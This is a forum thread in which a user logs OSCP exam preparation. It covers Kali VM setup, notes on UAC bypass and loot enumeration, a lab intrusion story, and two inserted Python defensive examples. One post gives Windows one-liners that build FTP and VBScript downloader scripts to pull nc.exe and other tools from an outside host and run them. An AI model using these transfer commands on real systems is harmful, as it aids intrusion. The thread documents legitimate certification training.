    Network - Adapter 1 - Advanced - Adapter Type: "Intel PRO/1000 MT Desktop (82540EM)"
    Network - Adapter 1 - Advanced - Promiscuous Mode: Allow All
    Network - Adapter 1 - Advanced - MAC Address: 444444444444
    NOTE: Set the MAC address to an easily identifiable MAC
    Network - Adapter 1 - Advanced - Cable Connected: Tick
    - Click "OK" to close the "Kali110a-32bit-NOPAE - Settings" screen
    - Right-click "Kali110a-32bit-NOPAE" in the left menu and click "Start"


    Note: A new screen "Kali110a-32bit-NOPAE [Running] - Oracle VM VirtualBox" opens and the Kali Linux installer will boot.


    In the "Kali110a-32bit-NOPAE [Running] - Oracle VM VirtualBox" screen:
    Your new Kali installation will boot, let it time out for 5s in the GRUB menu
    You will be presented with the Kali login screen
    Click anywhere in the screen with your mouse
    Note: To unlock the mouse from Virtualbox, press the rightmost CTRL key on your keyboard
    - Click on "Other..."
    - Username: root <enter>
    - Password: toor <enter>
    Note: You will be presented a desktop environment.
    Note: Do *NOT* update Kali linux, we'll make a backup first so you can go back to a clean Kali installation


    In the top of the screen, click the black >_ icon ("terminal")
    In the "root@Kali110a:~" terminal window type (omit "root@kali:~# "):
    root@kali:~# ifconfig
    Note: You should see eth0 has an IP address
    root@kali:~# ping 8.8.8.8
    Note: You should see replies from 8.8.8.8
    - Close the "root@kali:~" terminal window
    Press the right-most CTRL key on your keyboard to unlock the mouse
    In the top menu bar of the "Kali110a-32bit-NOPAE [Running] - Oracle VM VirtualBox" screen:
    - Click "Devices" -> "Insert Guest Additions CD Image..."
    - Click "Cancel" in your Kali desktop popup to dismiss the autorun popup
    In the top of the screen, click the black >_ icon ("terminal")
    In the "root@kali:~" terminal window type (omit "root@kali:~# "):
    root@kali:~# cp /media/cdrom/VBoxLinuxAdditions.run .
    root@kali:~# ./VBoxLinuxAdditions.run
    Note: VirtualBox Linux Guest additions will now install
    root@kali:~# reboot
    Note: After rebooting you will notice that your mouse magically enters and exits the VM. This is because of the VirtualBox Additions!
    - Press <Enter> on "Other..."
    Username: root <enter>
    Password: kali <enter>
    - Right-click "VBOXADDITIONS_4.3.18_96516" and click "Eject" near the bottom
    Note: Now that you have installed the VirtualBox additions to Kali, you can:
    - Seamlessly move the mouse in and out of the virtual machine
    - Copy/Paste to and from the virtual machine using clipboard
    - Share folders between the virtual machine guest and your host machine
    In the top of the screen, click the black >_ icon ("terminal")
    In the "root@kali:~" terminal window type (omit "root@kali:~# "):
    root@kali:~# shutdown -h now
    Note: Now that we have a good clean install of Linux Kali, we'll back it up so you can restore a clean install in minutes if required


    In the "Oracle VM VirtualBox Manager" window:
    - Click "File" -> "Export Appliance..."
    - Left-click "Kali110a-32bit-NOPAE" to highlight it
    - Click "Next >"
    File: "D:\STUDY\OSCP\VIRTUAL_MACHINES\VANILLA_BACKUPS\Kali110a-32bit-NOPAE.ova"
    Format: "OVF 1.0"
    Write Manifest file: Tick
    - Click "Next >"
    - Click "Export"
    Note: The export can take quite a while
    Note: After the export finishes, we have completed the installation of Kali in your network!

  19. Member
    Join Date
    May 2015
    Posts
    79
    #18
    I've focused on the Windows platform in recent days. I managed to grab my notebook and took notes while falling down the rabbit hole. I've counted 493 pages in my notebook so far, of which about half is scripts and text.


    Over the last few days I've learnt/done:
    - Default Windows UAC settings are easy to bypass as long as the setting is not set to "Always prompt me when programs try to run with elevated privileges". By default, Windows 7 has this setting disabled. I've coded several pieces of code that allow me to run my own programs without being prompted by UAC. I'm not sure if I will need this functionality in the labs, but if I do, it will save me some research and compilation.
    - A properly built and secured Windows machine is not trivial to exploit.
    - I've been building a list of "interesting files" as part of my ever growing "loot list". I'll be enumerating 3 times per host: The first time is during remote enumeration, the second time I will enumerate as a low privilege user, the third time I will enumerate as the system/root account. Literally "Enumerate, Enumerate and Enumerate some more". The enumeration scripts for the local user and root user are very similar: After all, I don't know which files I will have access to under either account so I have to run all checks in my loot list, without prejudice. Would I expect an admin to give world readable permissions to the shadow file? No, but someone else might! For instance, a badly configured machine might allow access to the SAM database as a low privileged user, so any loot that would be interesting to run under the root account would be equally (if not more) interesting under the low privilege account. Similarly, some files might be hidden to my low privilege user which will only be reachable under the system/root account.
    - I worked on my Windows one-liner command skills, learnt a lot
    - I created a tool-set for downloading files to Windows machines using various techniques for different platforms, using only default tools available on the target host. I would imagine that on most Windows machines, tools like nc.exe won't be available so this will provide me with an easy way to transfer the files without requiring additional tools on the Windows machine.
    - I've learnt that a Philips HD9240 Airfryer makes delicious, crispy fries! (I bought one last week)


    Over the last few weeks I've come to understand the importance of having a solid documenting methodology. I understand now just how easy it is to get lost in all the information out there. Spending a few days early on, perfecting my documentation system has been critical in keeping my gathered information categorized. I'm using the same major folder structure as per my post #6, and with almost 500 pages of documentation it's still easy to find information.


    I still have much to do before I can consider myself ready on the Windows platform: Pre-compiling exploits, scripting, privilege escalation to name a few big ones. And that's just the Windows side of things, after Windows there is Linux, databases, web-servers etc... I am starting to understand how people can get bogged down in their progress.
    Last edited by JollyFrogs; 05-31-2015 at 05:44 AM.
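The "would an admin really make the shadow file world-readable?" point above is exactly what a defender should be checking for before an attacker does. The following is an added example, not code from JollyFrogs' post or loot list: it audits a set of sensitive files against a baseline of the loosest permissions each should have and reports any extra bits. The baseline table and the throwaway directory tree it builds are constructed for the example; on a real host you would point `audit()` at `/` with your own baseline.

```python
"""Audit sensitive files for permissions looser than an expected baseline.

Added example (not from the forum post). The baseline below is an
assumption chosen for the demo; build_demo_tree() creates constructed
files under a temporary directory so the audit runs anywhere.
"""
import os
import stat
import tempfile

# Assumed baseline: the loosest mode each file should ever carry.
# Paths are relative so the same table works against a mounted image or "/".
BASELINE = {
    "etc/shadow": 0o640,
    "etc/passwd": 0o644,
    "root/.ssh/id_rsa": 0o600,
}

# Human-readable names for the bits we care about when reporting.
BIT_NAMES = (
    (stat.S_IROTH, "o+r"), (stat.S_IWOTH, "o+w"), (stat.S_IXOTH, "o+x"),
    (stat.S_IRGRP, "g+r"), (stat.S_IWGRP, "g+w"), (stat.S_IXGRP, "g+x"),
    (stat.S_ISUID, "setuid"), (stat.S_ISGID, "setgid"),
)


def excess_bits(actual_mode, max_mode):
    """Permission bits set on the file that the baseline does not allow."""
    return stat.S_IMODE(actual_mode) & ~max_mode


def describe_bits(bits):
    """Translate a bitmask of excess permissions into names like 'o+r'."""
    return [name for bit, name in BIT_NAMES if bits & bit]


def audit(root, baseline=BASELINE):
    """Return (relative path, actual mode, [excess bit names]) for each
    baseline file whose mode is looser than allowed. Missing files are
    skipped, since a file that is absent cannot leak anything."""
    findings = []
    for rel, max_mode in baseline.items():
        path = os.path.join(root, rel)
        try:
            st = os.lstat(path)  # lstat: do not follow a planted symlink
        except FileNotFoundError:
            continue
        extra = excess_bits(st.st_mode, max_mode)
        if extra:
            findings.append((rel, oct(stat.S_IMODE(st.st_mode)), describe_bits(extra)))
    return findings


def build_demo_tree():
    """Create a constructed directory tree with one deliberately
    world-readable 'shadow' file so the audit has something to find."""
    root = tempfile.mkdtemp(prefix="permaudit-")
    demo_modes = (
        ("etc/shadow", 0o644),        # too loose: others can read it
        ("etc/passwd", 0o644),        # fine, passwd is meant to be readable
        ("root/.ssh/id_rsa", 0o600),  # fine
    )
    for rel, mode in demo_modes:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("constructed sample content\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    demo_root = build_demo_tree()
    for rel, mode, names in audit(demo_root):
        print(f"{rel}: mode {mode} has unexpected bits {', '.join(names)}")
```

The check uses `lstat` rather than `stat` so a symlink dropped in place of a sensitive file is reported on its own rather than silently resolving to whatever it points at, and a missing file is not treated as a finding.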

  20. Member
    Join Date
    May 2015
    Posts
    79
    #19
    It's Saturday and another week has flown by. I've had to burn the midnight oil at work and I haven't been able to put in as much study time as I wanted. I did study every day though, just not the 3 hours I initially planned. I've modified my attack vector slightly, including public research in the passive recon step, and creating a new step for social engineering and client-side attacks. I still like the idea of having sub-folders with the various platforms so I've left that bit untouched. I started attaching my compiled exploits into my notebook, organized by platform. I haven't had a crash yet but I ensure I keep saving the notebook every 5-10 minutes, with a full notebook backup every 2-3 hours and at the end of each day. I decided to zip the exploits before attaching them, which allows me to double-click on an entry in my KeepNote notebook which will open the contents of the zip file (the exploit) in my 7-zip explorer-like window. I wasn't keen on double-clicking on executable exploits in KeepNote on my day-to-day desktop machine, even though I know they won't harm my machine since I coded them. I only pre-compiled exploits with bind shells privilege escalation exploits, and I ensured that all my exploits have easily swappable shell-codes. I have kept the sources of my exploits with detailed guides on how to compile on Kali for when I need reverse shells. I have come up with a naming convention which allows me to quickly search through the ever growing list of exploits and source codes I'm hoarding. Every script and piece of code starts with a note on how to compile, how to use and how to modify.

    Here are some of my Windows one-liners, these two methods can be used for any command that requires multiple lines, for instance when creating an FTP script or creating a visual basic script to download a file:

    set r=^&echo:&&(echo open 10.1.1.110 21%r%ftp%r%bin%r%GET nc.exe%r%bye) > ftp.txt&&ftp -s:ftp.txt
    or
    (for %t in ("open 10.1.1.110 21" ftp bin "GET nc.exe" bye) do @echo %~t) >ftp.txt&&ftp -s:ftp.txt

    Keep in mind that the Windows nc.exe tool has a limitation on the amount of data you can send per command. For instance, nc.exe will crash with the following one-liner because it is too long (it works in cmd.exe and other cli's, just not via nc.exe):

    (for %t in ("strUrl = WScript.Arguments.Item(0)" "StrFile = WScript.Arguments.Item(1)" "Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0" "Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0" "Const HTTPREQUEST_PROXYSETTING_DIRECT = 1" "Const HTTPREQUEST_PROXYSETTING_PROXY = 2" "Dim http,varByteArray,strData,strBuffer,lngCounter,fs, ts" "Err.Clear" "Set http = Nothing" "Set http = CreateObject("WinHttp.WinHttpRequest.5.1")" "If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest")" "If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP")" "If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP")" "http.Open "GET",strURL,False" "http.Send" "varByteArray = http.ResponseBody" "Set http = Nothing" "Set fs = CreateObject("Scripting.FileSystemObject")" "Set ts = fs.CreateTextFile(StrFile,True)" "strData = """ "strBuffer = """ "For lngCounter = 0 to UBound(varByteArray)" "ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1)))" "Next" "ts.Close") do @echo %~t) >wget.vbs && cscript wget.vbs http://10.1.1.110/putty.exe putty.exe
    Last edited by JollyFrogs; 06-06-2015 at 12:51 AM.

  21. Senior Member MrAgent's Avatar
    Join Date
    Oct 2010
    Location
    Northern Virginia
    Posts
    1,283

    Certifications
    Sec+, MCP, MCSA 2003, MCTS, MCITP:VA, VCP5, MCSA 2012, MCSE Private Cloud, MCSE Server Infrastructure, C|EHv7, RHCSA, OSCP, GCIH, OSWP
    #20
    Nice write up so far. I'm sure you'll be able to pass the exam on the first pass.
    2016 Goals: GCIH, OSWP - DONE!
    My OSCP review http://www.jasonbernier.com/oscp-review/

  22. Member
    Join Date
    May 2015
    Posts
    79
    #21
    I signed up today! I enlisted with my work email, got an email on my work email with confirmation code, which I used to sign up. My account is being generated after which I will have to test out lab access. When this is confirmed, I will get the option to pay for the 90 days of labs and the exam. I'm really looking forward to starting the lab and I'm keen to see if my preparations will pay off. My goal is 100% of the lab machines owned.

  23. Member
    Join Date
    May 2015
    Posts
    79
    #22
    I have completed my sign up for the Penetration Testing with Kali (the required course to sit the OSCP exam).
    The process is as follows:
    - Sign up via offensive-security.com website with a non-public email address
    - Get an email from them shortly after with a registration link
    - Use the link in the email to reserve a starting date for the labs
    - Receive an email shortly after (within a day or so) with VPN details to test the VPN connection for up to 48hrs and a payment link
    - After verifying the VPN connection works, pay for the course using the payment link (within 72 hours)
    - Wait until the starting day

    So I received my VPN details to test the connection. I tested the connectivity and decided to run a quick nmap scan and to my surprise I was connected to the real lab... and I had 48 hours of play time! I wasn't going to let that go to waste, although if I had to sign up again I probably would have signed up on a Thursday so I had the whole weekend to play. I have a full time job so I only had about 5 hours total in the labs, minus the time it took to set up the connection. So naturally, I decided to give it a go. My scan revealed many boxes with a fair amount of open ports: This was going to be good! The OffSec people had specified in the email which host ranges to scan, and my IP address was in the 192.168.14.x range. They mentioned I should be able to ping the x.x.x.220 IP address of my range, depending on which of the lab ranges I ended up in (random). The range though, is a /23. I tried pinging 192.168.14.220 and couldn't ping it but when I tried 192.168.15.220 I saw ping replies.

    So out came nmap as per my methodology explained in my earlier post:
    nmap -Pn -F -sSU -T5 -oX /root/192.168.15.200-254.xml 192.168.15.200-254 | grep -vE 'filtered|closed' > /root/quick_recon.txt

    This command took about 4 minutes to complete, and the open ports lit up like a Christmas tree. I didn't really have any idea or preference of which host to attack first, and seeing so many open ports on so many machines, I figured the simplest approach would be to start at the lowest IP and work my way up through the IP addresses.

    I started with the first IP address. After enumerating the host, I found a vulnerability I could exploit. I didn't want to use Metasploit for this because I would learn more doing things by hand first. I didn't start up my listener before I fired off my fumbled attempt to exploit and this resulted in a denial of service on the machine: I crashed it by accident and had no way to reset it. I didn't have a GUI panel available to reset hosts since I was only supposed to be testing the VPN connection.

    After this silly mistake I decided to change my attack methodology, mainly because I want to maximize my time in the labs and exploit every host: I will use Metasploit for mundane tasks like reverse shells, simple fire-and-forget exploits and uploading files through Meterpreter. After I complete the labs and if I still have time left, I will repeat the exploits by hand.

    I then moved on to the next host which I expect will require some form of brute-forcing. I was looking for something a little more meaty than building a word-list and running a brute force tool against a server so I proceeded to the next IP in the list. My next target was called Bob, and I had a great time breaking into Bob. I went to bed 2 hours later than I had planned to, I just couldn't get myself to go to bed knowing I could solve this puzzle. My persistence paid off, and after about 3 hours of puzzling and taking notes and screenshots, Bob was mine... and it felt great! I looted the box, left behind the digital equivalent of graffiti (a "Jollyfrogs.txt" file with some words of wisdom) and logged off from the VPN, tired but extremely satisfied.

    Being the first host I exploited to system/root level, it certainly will be a name I will remember. I didn't have time to look at other hosts but Bob made me realize that my generic approach works which is a relief.

    My exam starts Sunday the 21st of June (next week) and I'm excited to start!
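The quick-recon command in the post above writes an XML report with `-oX` and then greps the human-readable output for lines that are not "filtered" or "closed". Grepping the text output is fragile (a single `|` in a basic regex is a literal character, and nmap's text layout changes between versions); the XML file is the stable interface. The following is an added example, not JollyFrogs' script or an nmap tool: it parses nmap's `-oX` format and lists open ports per live host, optionally including UDP "open|filtered" results. The embedded XML is constructed to match nmap's schema and is not a real scan of anything.

```python
"""List open ports per host from an nmap -oX XML report.

Added example (not from the forum post). SAMPLE_NMAP_XML is a
constructed document shaped like nmap's -oX output; the addresses,
hostnames and ports in it are made up for the demo.
"""
import xml.etree.ElementTree as ET

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -Pn -F -sSU -T5 -oX scan.xml 192.168.15.200-202">
  <host><status state="up"/>
    <address addr="192.168.15.200" addrtype="ipv4"/>
    <hostnames><hostname name="bob.example" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
      <port protocol="tcp" portid="443"><state state="closed"/><service name="https"/></port>
      <port protocol="udp" portid="161"><state state="open|filtered"/><service name="snmp"/></port>
    </ports>
  </host>
  <host><status state="up"/>
    <address addr="192.168.15.201" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="139"><state state="filtered"/><service name="netbios-ssn"/></port>
    </ports>
  </host>
  <host><status state="down"/>
    <address addr="192.168.15.202" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_open_ports(xml_text, include_open_filtered=False):
    """Return {ipv4: [(protocol, port, service), ...]} for hosts that are up.

    Only ports in state "open" are kept, mirroring the intent of the
    grep -v 'filtered|closed' filter. UDP probes often come back as
    "open|filtered"; pass include_open_filtered=True to keep those too.
    """
    root = ET.fromstring(xml_text)
    results = {}
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # down hosts carry no port data worth listing
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        open_ports = []
        for port in host.findall("./ports/port"):
            state_el = port.find("state")
            state = state_el.get("state") if state_el is not None else ""
            if state == "open" or (include_open_filtered and state == "open|filtered"):
                svc = port.find("service")
                name = svc.get("name") if svc is not None else ""
                open_ports.append((port.get("protocol"), int(port.get("portid")), name))
        results[addr_el.get("addr")] = sorted(open_ports)
    return results


def format_report(results):
    """One line per host, sorted numerically by address (not lexically)."""
    def ip_key(addr):
        return tuple(int(octet) for octet in addr.split("."))

    lines = []
    for addr in sorted(results, key=ip_key):
        ports = results[addr]
        if not ports:
            lines.append(f"{addr}: no open ports")
            continue
        summary = ", ".join(f"{port}/{proto} ({name})" for proto, port, name in ports)
        lines.append(f"{addr}: {summary}")
    return "\n".join(lines)


if __name__ == "__main__":
    # To use a real report, replace SAMPLE_NMAP_XML with open(path).read().
    print(format_report(parse_open_ports(SAMPLE_NMAP_XML)))
```

Because the function keys on the XML `state` attribute rather than on text, a port reported as "open|filtered" is excluded by default and only shown when asked for, which keeps noisy UDP results from padding the list of hosts to look at first.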

  24. Senior Member MrAgent's Avatar
    Join Date
    Oct 2010
    Location
    Northern Virginia
    Posts
    1,283

    Certifications
    Sec+, MCP, MCSA 2003, MCTS, MCITP:VA, VCP5, MCSA 2012, MCSE Private Cloud, MCSE Server Infrastructure, C|EHv7, RHCSA, OSCP, GCIH, OSWP
    #23
    Good thread so far. Keep it up!
    How much time did you sign up for?
    2016 Goals: GCIH, OSWP - DONE!
    My OSCP review http://www.jasonbernier.com/oscp-review/

  25. Member
    Join Date
    May 2015
    Posts
    79
    #24
    Quote Originally Posted by MrAgent View Post
    Good thread so far. Keep it up!
    How much time did you sign up for?
    Hi MrAgent, I signed up for 90 days.

  26. Stayed at a Holiday Inn.. the_Grinch's Avatar
    Join Date
    May 2007
    Posts
    3,826

    Certifications
    BS-CST CISSP GMON MPSC Security+ XRY 1+2+3 XAMN AAA AA
    #25
    Awesome posts! Let me just commend you on all the work you have done prior to signing up. What's your background?
    WIP:
    MS in Legal Studies - Drexel University
    Mobile Forensics
    Kotlin
    Python
